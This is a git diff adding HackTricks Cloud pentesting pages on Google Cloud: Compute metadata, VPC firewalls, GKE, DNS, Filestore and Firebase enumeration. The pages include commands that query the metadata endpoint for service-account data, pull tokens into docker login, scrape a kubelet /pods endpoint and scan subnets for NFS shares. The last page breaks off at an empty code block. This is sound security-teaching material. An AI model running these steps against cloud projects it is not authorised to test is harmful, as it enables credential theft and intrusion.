+### Service Account
+
+By default, the **Compute Engine default service account** will be used. The email of this SA is like: `<proj-num>-compute@developer.gserviceaccount.com`\
+This service account has **Editor role over the whole project (high privileges).**
+
+And the **default access scopes** are the following:
+
+* **https://www.googleapis.com/auth/devstorage.read\_only** -- Read access to buckets :)
+* https://www.googleapis.com/auth/logging.write
+* https://www.googleapis.com/auth/monitoring.write
+* https://www.googleapis.com/auth/servicecontrol
+* https://www.googleapis.com/auth/service.management.readonly
+* https://www.googleapis.com/auth/trace.append
+
+However, it's possible to **grant it `cloud-platform` with a click** or specify **custom ones**.
+
+<figure><img src="../../../../.gitbook/assets/image (327).png" alt=""><figcaption></figcaption></figure>
+
+### Firewall
+
+It's possible to allow HTTP and HTTPS traffic.
+
+<figure><img src="../../../../.gitbook/assets/image (326).png" alt=""><figcaption></figcaption></figure>
+
+### Networking
+
+* **IP Forwarding**: It's possible to **enable IP forwarding** from the creation of the instance.
+* **Hostname**: It's possible to give the instance a permanent hostname.
+* **Interface**: It's possible to add a network interface
+
+### Extra Security
+
+These options will **increase the security** of the VM and are recommended:
+
+* **Secure boot:** Secure boot helps protect your VM instances against boot-level and kernel-level malware and rootkits.
+* **Enable vTPM:** Virtual Trusted Platform Module (vTPM) validates your guest VM pre-boot and boot integrity, and offers key generation and protection.
+* **Integrity supervision:** Integrity monitoring lets you monitor and verify the runtime boot integrity of your shielded VM instances using Stackdriver reports. Requires vTPM to be enabled.
+
+### VM Access
+
+The common way to enable access to the VM is by **allowing certain SSH public keys** to access the VM.\
+However, it's also possible to **enable the access to the VM vial `os-config` service using IAM**. Moreover, it's possible to enable 2FA to access the VM using this service.\
+When this **service** is **enabled**, the access via **SSH keys is disabled.**
+
+<figure><img src="../../../../.gitbook/assets/image (328).png" alt=""><figcaption></figcaption></figure>
+
+### Metadata
+
+It's possible to define **automation** (userdata in AWS) which are **shell commands** that will be executed every time the machine turns on or restarts.
+
+It's also possible to **add extra metadata key-value values** that are going to be accessible from the metadata endpoint. This info is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the **`describe` method** from a command in the enumeration section, but it could also be retrieved from the inside of the instance accessing the metadata endpoint.
+
+```bash
+# view project metadata
+curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
+    -H "Metadata-Flavor: Google"
+
+# view instance metadata
+curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
+    -H "Metadata-Flavor: Google"
+```
+
+Moreover, **auth token for the attached service account** and **general info** about the instance, network and project is also going to be available from the **metadata endpoint**. For more info check:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440" %}
+
+### Encryption
+
+A Google-managed encryption key is used by default a but a Customer-managed encryption key (CMEK) can be configured. You can also configure what to do when the used CMEF is revoked: Noting or shut down the VM.
+
+<figure><img src="../../../../.gitbook/assets/image (329).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md
new file mode 100644
index 0000000000..87cc18241e
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md
@@ -0,0 +1,112 @@
+# GCP - VPC & Networking
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## **GCP Compute Networking in a Nutshell**
+
+**VPCs** contains **Firewall** rules to allow incoming traffic to the VPC. VPCs also contains **subnetworks** where **virtual machines** are going to be **connected**.\
+Comparing with AWS, **Firewall** would be the **closest** thing to **AWS** **Security Groups and NACLs**, but in this case these are **defined in the VPC** and not in each instance.
+
+## **VPC, Subnetworks & Firewalls in GCP**
+
+Compute Instances are connected **subnetworks** which are part of **VPCs** ([Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc)). In GCP there aren't security groups, there are [**VPC firewalls**](https://cloud.google.com/vpc/docs/firewalls) with rules defined at this network level but applied to each VM Instance.
+
+### Subnetworks
+
+A **VPC** can have **several subnetworks**. Each **subnetwork is in 1 region**.
+
+### Firewalls
+
+By default, every network has two [**implied firewall rules**](https://cloud.google.com/vpc/docs/firewalls#default_firewall_rules): **allow outbound** and **deny inbound**.
+
+When a GCP project is created, a VPC called **`default`** is also created, with the following firewall rules:
+
+* **default-allow-internal:** allow all traffic from other instances on the `default` network
+* **default-allow-ssh:** allow 22 from everywhere
+* **default-allow-rdp:** allow 3389 from everywhere
+* **default-allow-icmp:** allow ping from everywhere
+
+{% hint style="warning" %}
+As you can see, **firewall rules** tend to be **more permissive** for **internal IP addresses**. The default VPC permits all traffic between Compute Instances.
+{% endhint %}
+
+More **Firewall rules** can be created for the default VPC or for new VPCs. [**Firewall rules**](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following **methods**:
+
+* [**Network tags**](https://cloud.google.com/vpc/docs/add-remove-network-tags)
+* [**Service accounts**](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts)
+* **All instances within a VPC**
+
+Unfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, services accounts, and instances.
+
+This process was automated using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum) which will export the following:
+
+* CSV file showing instance, public IP, allowed TCP, allowed UDP
+* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)
+* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)
+
+### Hierarchical Firewall Policies <a href="#hierarchical-firewall-policies" id="hierarchical-firewall-policies"></a>
+
+_Hierarchical firewall policies_ let you create and **enforce a consistent firewall policy across your organization**. You can assign **hierarchical firewall policies to the organization** as a whole or to individual **folders**. These policies contain rules that can explicitly deny or allow connections.
+
+You create and apply firewall policies as separate steps. You can create and apply firewall policies at the **organization or folder nodes of the** [**resource hierarchy**](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy). A firewall policy rule can **block connections, allow connections, or defer firewall rule evaluation** to lower-level folders or VPC firewall rules defined in VPC networks.
+
+By default, all hierarchical firewall policy rules apply to all VMs in all projects under the organization or folder where the policy is associated. However, you can **restrict which VMs get a given rule** by specifying [target networks or target service accounts](https://cloud.google.com/vpc/docs/firewall-policies#targets).
+
+You can read here how to [**create a Hierarchical Firewall Policy**](https://cloud.google.com/vpc/docs/using-firewall-policies#gcloud).
+
+### Firewall Rules Evaluation
+
+<figure><img src="../../../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
+
+1. Org: Firewall policies assigned to the Organization
+2. Folder: Firewall policies assigned to the Folder
+3. VPC: Firewall rules assigned to the VPC
+4. Global: Another type of firewall rules that can be assigned to VPCs
+5. Regional: Firewall rules associated with the VPC network of the VM's NIC and region of the VM.
+
+## VPC Network Peering
+
+Allows to connect two Virtual Private Cloud (VPC) networks so that **resources in each network can communicate** with each other.\
+Peered VPC networks can be in the same project, different projects of the same organization, or **different projects of different organizations**.
+
+These are the needed permissions:
+
+* `compute.networks.addPeering`
+* `compute.networks.updatePeering`
+* `compute.networks.removePeering`
+* `compute.networks.listPeeringRoutes`
+
+[**More in the docs**](https://cloud.google.com/vpc/docs/vpc-peering).
+
+## References
+
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+* [https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation](https://cloud.google.com/vpc/docs/firewall-policies-overview#rule-evaluation)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md
new file mode 100644
index 0000000000..5724894e60
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md
@@ -0,0 +1,130 @@
+# GCP - Containers & GKE Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Containers
+
+In GCP containers you can find most of the containers based services GCP offers, here you can see how to enumerate the most common ones:
+
+```bash
+gcloud container images list
+gcloud container images list --repository us.gcr.io/<project-name> #Search in other subdomains repositories
+gcloud container images describe <name>
+gcloud container subnets list-usable
+gcloud container clusters list
+gcloud container clusters describe <name>
+gcloud container clusters get-credentials [NAME]
+
+# Run a container locally
+docker run --rm -ti gcr.io/<project-name>/secret:v1 sh
+
+# Login & Download
+sudo docker login -u oauth2accesstoken -p $(gcloud auth print-access-token) https://HOSTNAME
+## where HOSTNAME is gcr.io, us.gcr.io, eu.gcr.io, or asia.gcr.io.
+sudo docker pull HOSTNAME/<project-name>/<image-name>
+```
+
+### Privesc
+
+In the following page you can check how to **abuse container permissions to escalate privileges**:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-container-privesc.md" %}
+[gcp-container-privesc.md](../gcp-privilege-escalation/gcp-container-privesc.md)
+{% endcontent-ref %}
+
+## Node Pools
+
+These are the pool of machines (nodes) that form the kubernetes clusters.
+
+```bash
+# Pool of machines used by the cluster
+gcloud container node-pools list --zone <zone> --cluster <cluster>
+gcloud container node-pools describe --cluster <cluster> --zone <zone> <node-pool>
+```
+
+## Kubernetes
+
+For information about what is Kubernetes check this page:
+
+{% content-ref url="../../kubernetes-security/" %}
+[kubernetes-security](../../kubernetes-security/)
+{% endcontent-ref %}
+
+First, you can check to see if any Kubernetes clusters exist in your project.
+
+```
+gcloud container clusters list
+```
+
+If you do have a cluster, you can have `gcloud` automatically configure your `~/.kube/config` file. This file is used to authenticate you when you use [kubectl](https://kubernetes.io/docs/reference/kubectl/overview/), the native CLI for interacting with K8s clusters. Try this command.
+
+```
+gcloud container clusters get-credentials [CLUSTER NAME] --region [REGION]
+```
+
+Then, take a look at the `~/.kube/config` file to see the generated credentials. This file will be used to automatically refresh access tokens based on the same identity that your active `gcloud` session is using. This of course requires the correct permissions in place.
+
+Once this is set up, you can try the following command to get the cluster configuration.
+
+```
+kubectl cluster-info
+```
+
+You can read more about `gcloud` for containers [here](https://cloud.google.com/sdk/gcloud/reference/container/).
+
+This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_k8s_enum)
+
+### TLS Boostrap Privilege Escalation
+
+Initially this privilege escalation technique allowed to **privesc inside the GKE cluster** effectively allowing an attacker to **fully compromise it**.
+
+This is because GKE provides [TLS Bootstrap credentials](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/) in the metadata, which is **accessible by anyone by just compromising a pod**.
+
+The technique used is explained in the following posts:
+
+* [https://www.4armed.com/blog/hacking-kubelet-on-gke/](https://www.4armed.com/blog/hacking-kubelet-on-gke/)
+* [https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/](https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/)
+* [https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/)
+
+Ans this tool was created to automate the process: [https://github.com/4ARMED/kubeletmein](https://github.com/4ARMED/kubeletmein)
+
+However, the technique abused the fact that **with the metadata credentials** it was possible to **generate a CSR** (Certificate Signing Request) for a **new node**, which was **automatically approved**.\
+In my test I checked that **those requests aren't automatically approved anymore**, so I'm not sure if this technique is still valid.
+
+### Secrets in Kubelet API <a href="#the-kubelet-api-git-secrets-redux" id="the-kubelet-api-git-secrets-redux"></a>
+
+In [**this post**](https://blog.assetnote.io/2022/05/06/cloudflare-pages-pt3/) it was discovered it was discovered a Kubelet API address accesible from inside a pod in GKE giving the details of the pods running:
+
+```
+curl -v -k http://10.124.200.1:10255/pods
+```
+
+Even if the API **doesn't allow to modify resources**, it could be possible to find **sensitive information** in the response. The endpoint /pods was found using [**Kiterunner**](https://github.com/assetnote/kiterunner).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md
new file mode 100644
index 0000000000..136c2dcce9
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md
@@ -0,0 +1,51 @@
+# GCP - DNS Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## GCP - Cloud DNS
+
+Google Cloud DNS is a high-performance, resilient, global Domain Name System (DNS) service.
+
+```bash
+# This will usually error if DNS service isn't configured in the project
+gcloud dns project-info describe <project>
+
+# Get DNS zones & records
+gcloud dns managed-zones list
+gcloud dns managed-zones describe <zone>
+gcloud dns record-sets list --zone <zone> # Get record of the zone
+
+# Policies
+## A response policy is a collection of selectors that apply to queries made against one or more virtual private cloud networks. 
+gcloud dns response-policies list
+## DNS policies control internal DNS server settings. You can apply policies to DNS servers on Google Cloud Platform VPC networks you have access to.
+gcloud dns policies list
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md
new file mode 100644
index 0000000000..d60c12b009
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md
@@ -0,0 +1,105 @@
+# GCP - Filestore Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud Filestore is a **managed file storage service** tailored for applications in need of both a **filesystem interface and a shared filesystem for data**. This service excels by offering high-performance file shares, which can be integrated with various GCP services. Its utility shines in scenarios where traditional file system interfaces and semantics are crucial, such as in media processing, content management, and the backup of databases.
+
+You can think of this like any other **NFS** **shared document repository -** a potential source of sensitive info.
+
+### Connections
+
+When creating a Filestore instance it's possible to **select the network where it's going to be accessible**.
+
+Moreover, by **default all clients on the selected VPC network and region are going to be able to access it**, however, it's possible to **restrict the access also by IP address** or range and indicate the access privilege (Admin, Admin Viewer, Editor, Viewer) user the client is going to get **depending on the IP address.**
+
+It can also be accessible via a **Private Service Access Connection:**
+
+* Are per VPC network and can be used across all managed services such as Memorystore, Tensorflow and SQL.
+* Are **between your VPC network and network owned by Google using a VPC peering**, enabling your instances and services to communicate exclusively by **using internal IP addresses**.
+* Create an isolated project for you on the service-producer side, meaning no other customers share it. You will be billed for only the resources you provision.
+* The VPC peering will import new routes to your VPC
+
+### Backups
+
+It's possible to create **backups of the File shares**. These can be later **restored in the origin** new Fileshare instance or in **new ones**.
+
+### Encryption
+
+By default a **Google-managed encryption key** will be used to encrypt the data, but it's possible to select a **Customer-managed encryption key (CMEK)**.
+
+### Enumeration
+
+If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist.
+
+{% code overflow="wrap" %}
+```bash
+# Instances
+gcloud filestore instances list # Check the IP address
+gcloud filestore instances describe --zone <zone> <name> # Check IP and access restrictions
+
+# Backups
+gcloud filestore backups list
+gcloud filestore backups describe --region <region> <backup>
+
+# Search for NFS shares in a VPC subnet
+sudo nmap -n -T5 -Pn -p 2049 --min-parallelism 100 --min-rate 1000 --open 10.99.160.2/20
+```
+{% endcode %}
+
+{% hint style="danger" %}
+Note that a filestore service might be in a **completely new subnetwork created for it** (inside a Private Service Access Connection, which is a **VPC peer**).\
+So you might need to **enumerate VPC peers** to also run nmap over those network ranges.
+
+{% code overflow="wrap" %}
+```bash
+# Get peerings
+gcloud compute networks peerings list
+# Get routes imported from a peering
+gcloud compute networks peerings list-routes <peering-name> --network=<network-name> --region=<region> --direction=INCOMING
+```
+{% endcode %}
+{% endhint %}
+
+### Privilege Escalation & Post Exploitation
+
+There aren't ways to escalate privileges in GCP directly abusing this service, but using some **Post Exploitation tricks it's possible to get access to the data** and maybe you can find some credentials to escalate privileges:
+
+{% content-ref url="../gcp-post-exploitation/gcp-filestore-post-exploitation.md" %}
+[gcp-filestore-post-exploitation.md](../gcp-post-exploitation/gcp-filestore-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-filestore-persistence.md" %}
+[gcp-filestore-persistence.md](../gcp-persistence/gcp-filestore-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md
new file mode 100644
index 0000000000..e4302bc44b
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md
@@ -0,0 +1,103 @@
+# GCP - Firebase Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
+
+The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/).
+
+### Unauthenticated Enum
+
+Some **Firebase endpoints** could be found in **mobile applications**. It is possible that the Firebase endpoint used is **configured badly grating everyone privileges to read (and write)** on it.
+
+This is the common methodology to search and exploit poorly configured Firebase databases:
+
+1. **Get the APK** of app you can use any of the tool to get the APK from the device for this POC.\
+   You can use “APK Extractor” [https://play.google.com/store/apps/details?id=com.ext.ui\&hl=e](https://hackerone.com/redirect?signature=3774f35d1b5ea8a4fd209d80084daa9f5887b105\&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.ext.ui%26hl%3Den)
+2. **Decompile** the APK using **apktool**, follow the below command to extract the source code from the APK.
+3. Go to the _**res/values/strings.xml**_ and look for this and **search** for “**firebase**” keyword
+4. You may find something like this URL “_**https://xyz.firebaseio.com/**_”
+5. Next, go to the browser and **navigate to the found URL**: _https://xyz.firebaseio.com/.json_
+6. 2 type of responses can appear:
+   1. “**Permission Denied**”: This means that you cannot access it, so it's well configured
+   2. “**null**” response or a bunch of **JSON data**: This means that the database is public and you at least have read access.
+      1. In this case, you could **check for writing privileges**, an exploit to test writing privileges can be found here: [https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit](https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit)
+
+**Interesting note**: When analysing a mobile application with **MobSF**, if it finds a firebase database it will check if this is **publicly available** and will notify it.
+
+Alternatively, you can use [Firebase Scanner](https://github.com/shivsahni/FireBaseScanner), a python script that automates the task above as shown below:
+
+```bash
+python FirebaseScanner.py -f <commaSeperatedFirebaseProjectNames>
+```
+
+### Authenticated Enum
+
+If you have credentials to access the Firebase database you can use a tool such as [**Baserunner**](https://github.com/iosiro/baserunner) to access more easily the stored information. Or a script like the following:
+
+```python
